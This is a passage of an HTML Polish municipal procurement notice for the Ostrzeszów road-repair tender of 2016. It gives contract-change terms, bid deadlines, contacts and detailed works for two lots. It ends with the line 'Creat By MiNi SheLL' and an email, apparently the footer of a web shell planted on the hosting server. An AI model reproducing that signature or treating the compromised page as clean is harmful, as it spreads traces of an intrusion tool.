3)	wystąpienia okoliczności powodujących zwiększenie lub zmniejszenie kosztów wykonania umowy po stronie Wykonawcy z powodu ustawowej zmiany stawki podatku od towarów i usług (VAT); 
4)	wystąpienia zmiany wynagrodzenia, wynikającej ze sposobu rozliczenia opisanego w  § 11 umowy; 
5)	wystąpienia konieczności zmiany osób, danych kontaktowych lub adresów stron wskazanych w niniejszej umowie, w szczególności:
a)  z powodu zdarzeń losowych wywołanych okolicznościami niemożliwymi do 
     przewidzenia przed zawarciem umowy;
b)  z  powodu zmian kadrowych;
c)  wystąpienia okoliczności skutkujących potrzebą zmian organizacyjnych stron, np. 
     zmiana reprezentacji lub adresu siedziby strony umowy.

4.	Zmiany umowy, o których mowa w pkt.3 mogą być wprowadzone  z zachowaniem następujących warunków: 
1)  wniosek o dokonanie zmiany umowy, zawierający uzasadnienie zmiany należy złożyć w formie pisemnej,
2)  ocenę zasadności zmiany  należy dokonać  po zapoznaniu się z uzasadnieniem i przy uwzględnieniu okoliczności sprawy,
3)  wszelkie zmiany umowy mogą być dokonywane z zachowaniem warunku, o którym mowa w pkt.1</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.ostrzeszow.nowoczesnagmina.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba Zamawiającego, tj: Urząd Miasta i Gminy w Ostrzeszowie, ul. Zamkowa 31, 63-500 Ostrzeszów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.02.2016 godzina 11:00, miejsce: siedziba Zamawiającego, tj: Urząd Miasta i Gminy w Ostrzeszowie, ul. Zamkowa 31, 63-500 Ostrzeszów. Biuro Obsługi Interesanta (Kancelaria Ogólna) - pokój nr 13 (parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Opłata za specyfikację istotnych warunków zamówienia: 22,50 PLN. Warunki i sposób płatności: płatne w Kasie w siedzibie zamawiającego, tj: w Urzędzie Miasta i Gminy w Ostrzeszowie ul. Zamkowa 31, 63-500 Ostrzeszów, od poniedziałku do piątku (w dniach urzędowania) w godz. 08:00 - 14:00 lub za pobraniem pocztowym z doliczeniem kosztów przekazania. 2. W prowadzonym postępowaniu oświadczenia wnioski, zawiadomienia oraz informacje zamawiający i wykonawcy przekazują pisemnie lub faksem. Jeżeli zamawiający lub wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje faksem, każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania. 3. Osobą uprawnioną do porozumiewania się z wykonawcami jest: a) Daniel Wieczorek - w sprawach dotyczących przedmiotu zamówienia, b) Marek Kurzawa, Ewa Tomczak - w sprawach dotyczących procedury przetargowej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Remont dróg gruntowych żużlem paleniskowym, profilowanie dróg równiarką, ścinka poboczy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Remont dróg gruntowych żużlem paleniskowym, profilowanie dróg równiarką, ścinka poboczy, obejmuje:

1)	Naprawę dróg gruntowych żużlem paleniskowym z rozścieleniem materiału równiarką samojezdną i uwałowaniem walcem samojezdnym,
2)	Mechaniczne profilowanie dróg równiarką samojezdną,
3)	Mechaniczne zagęszczenie nawierzchni walcem samojezdnym,
4)	Ścinkę  poboczy dróg równiarką na szerokości 0,5 m przy średniej grubości 0,10 m z zachowaniem spadku 6-8% oraz wywozem nadmiaru ziemi na odległość do 3 km.  

2.	Opis i warunki realizacji zamówienia określa dokumentacja projektowa, specyfikacja techniczna wykonania i odbioru robót budowlanych oraz istotne postanowienia umowy. Podane przez Zamawiającego ilości robót są ilościami szacunkowymi przyjętymi dla potrzeb  przeprowadzenia postępowania o udzielenie zamówienia, w tym dla oceny ofert.  Rzeczywista, ostateczna ilość robót wykonywanych w okresie obowiązywania umowy, będzie uzależniona od faktycznych potrzeb, określonych przez Zamawiającego w trakcie realizacji zamówienia. Zamawiający będzie sukcesywnie zlecał Wykonawcy roboty 
w miarę potrzeb, wynikających ze stanu technicznego dróg.

3.	Roboty wykonywane będą na czynnych dla ruchu drogach gminnych, przy zachowaniu obowiązujących przepisów i warunków bhp podczas prowadzenia robót drogowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Termin płatności - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Remont dróg gruntowych tłuczniem i destruktem bitumicznym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Remont dróg gruntowych tłuczniem i destruktem bitumicznym, obejmuje:

1)	Roboty pomiarowe przy robotach liniowych (drogi), które polegają na odtworzeniu trasy i punktów wysokościowych dróg w terenie (wyznaczenie granicy oraz szerokości pasa drogowego). 
2)	Mechaniczną ścinkę drzew o średnicy pni pow. 60 cm wraz z wywiezieniem pni do 10 km oraz uporządkowaniem terenu. 
3)	Mechaniczne karczowanie pni o średnicy pow. 60 cm wraz z wywiezieniem karpiny do10 km.
4)	Mechaniczną ścinkę drzew o średnicy pni 30-60 cm wraz z wywiezieniem pni do 10 km oraz uporządkowaniem terenu. 
5)	Mechaniczne karczowanie pni o średnicy 30-60 cm wraz z wywiezieniem karpiny do10 km.
6)	Mechaniczną ścinkę drzew o średnicy pni 16-30 cm wraz z wywiezieniem pni do 10 km oraz uporządkowaniem terenu. 
7)	Mechaniczne  karczowanie pni o średnicy 16-30 cm wraz z wywiezieniem karpiny do10 km.
8)	Mechaniczne karczowanie zagajników (krzaków): średnich (od 31-60 % powierzchni) wraz z wywiezieniem gałęzi do 10 km.
9)	Dowóz  piasku wraz z załadunkiem wbudowaniem, profilowaniem i zagęszczeniem na podniesienie niwelety drogi. 
10)	Zebranie, załadunek i wywóz  gruntu do 10 km w celu obniżenia niwelety drogi. 
11)	Ścinkę poboczy dróg na szerokości 0,5 m przy średniej grubości 0,10 m                                 z zachowaniem spadku 6-8% oraz wywozem nadmiaru ziemi na odległość do 3 km.
12)	Regulację wysokości studni i zaworów.
13)	Wykonanie koryta oraz nawierzchni z tłucznia kamiennego ze skały granitowej frakcji 31,5-63 mm poprzez rozścielenie równiarką samojezdną, zaklinowanie klińcem kamiennym ze skały granitowej frakcji 4-10 mm i uwałowanie walcem samojezdnym. Grubość warstwy tłucznia kamiennego po uwałowaniu 15 cm.                           
14)	Wykonanie koryta oraz nawierzchni z tłucznia kamiennego ze skały granitowej frakcji 31,5-63 mm poprzez rozścielenie równiarką samojezdną, zaklinowanie klińcem kamiennym ze skały granitowej frakcji 4-10 mm i uwałowanie walcem samojezdnym. Grubość warstwy tłucznia kamiennego po uwałowaniu 10 cm.                         
15)	Naprawę dróg tłuczniem kamiennym ze skały granitowej frakcji 31,5-63 mm                        z rozścieleniem, zaklinowaniem klińcem kamiennym ze skały granitowej frakcji 4-10 mm  i uwałowaniem.
16)	Naprawę dróg destruktem bitumicznym poprzez jego rozścielenie równiarką samojezdną i uwałowanie walcem samojezdnym. Grubość warstwy destruktu po uwałowaniu 10cm. 
17)	Podwójne powierzchniowe utrwalenie podbudowy tłuczniowej asfaltem i grysami przez oczyszczenie istniejącej podbudowy a następnie skropienie asfaltem D 180/220 w ilości 2,8 kg/m2, rozścielenie grysu 8-16 mm w ilości 32,4 kg/m2 i uwałowanie walcem drogowym. Warstwa górna wykonana zostanie poprzez skropienie asfaltem D180/220 w ilości 1,7 kg/m2, rozścielenie grysu 5-8 mm w ilości 23,4 kg/m2                                   i uwałowanie walcem. Niezwiązane ziarna należy usunąć poprzez oczyszczenie szczotką mechaniczną.  
18)	Remont cząstkowy nawierzchni tłuczniowej przy głębokości wyboi do 10 cm tłuczniem kamiennym ze skały granitowej  frakcji 31,5-63 mm z rozścieleniem, zaklinowaniem klińcem kamiennym ze skały granitowej frakcji 4-10 mm                                                 i uwałowaniem.
19)	Roboty ziemne wykonane koparkami podsiębiernymi o poj. łyżki 0,25 m3                              z demontażem zdeforomowanych rur oraz wybranie warstwy pod podbudowę                      (z wywozem materiału z rozbiórki na odległość do 3 km).
20)	Wykonanie nowej podbudowy z tłucznia kamiennego ze skały granitowej frakcji                  31,5-63 mm pod rurę gr. 20 cm po zagęszczeniu.
21)	Dostawa i ułożenie rur Wipro żelbet II (RWZ-2) lub równoważne o 400 mm.
22)	Dostawa i ułożenie rur Wipro żelbet II (RWZ-2) lub równoważne o 600 mm.
23)	Przepusty pod koroną drogi, kanały z rur PCV łączonych na wcisk o średnicy zewnętrznej O 400 mm z zasypaniem i zagęszczeniem.
24)	Ścianki czołowe dla przepustów rurowych o średnicy O 400 mm.
25)	Przepusty pod koroną drogi, kanały z rur PCV łączonych na wcisk o średnicy zewnętrznej O 600 mm z zasypaniem i zagęszczeniem.
26)	Ścianki czołowe dla przepustów rurowych o średnicy O 600 mm.
27)	Zasypanie wykopów w gruncie kat. I-II, z zagęszczeniem mechanicznym, grubość zagęszczanej warstwy 30 cm.
28)	Wykonanie koryta oraz rozłożenie i zagęszczenie tłucznia kamiennego ze skały granitowej frakcji 0-63 mm o gr. 15 cm po zagęszczeniu wraz z dowozem materiału do 10 km (materiał inwestora).

2.	Opis i warunki realizacji zamówienia określa dokumentacja projektowa, specyfikacja techniczna wykonania i odbioru robót budowlanych oraz istotne postanowienia umowy. Podane przez Zamawiającego ilości robót są ilościami szacunkowymi przyjętymi dla potrzeb  przeprowadzenia postępowania o udzielenie zamówienia, w tym dla oceny ofert.  Rzeczywista, ostateczna ilość robót wykonywanych w okresie obowiązywania umowy, będzie uzależniona od faktycznych potrzeb, określonych przez Zamawiającego w trakcie realizacji zamówienia. Zamawiający będzie sukcesywnie zlecał Wykonawcy roboty 
w miarę potrzeb, wynikających ze stanu technicznego dróg.


3.	Roboty wykonywane będą na czynnych dla ruchu drogach gminnych, przy zachowaniu obowiązujących przepisów i warunków bhp podczas prowadzenia robót drogowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Termin płatności - 3</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com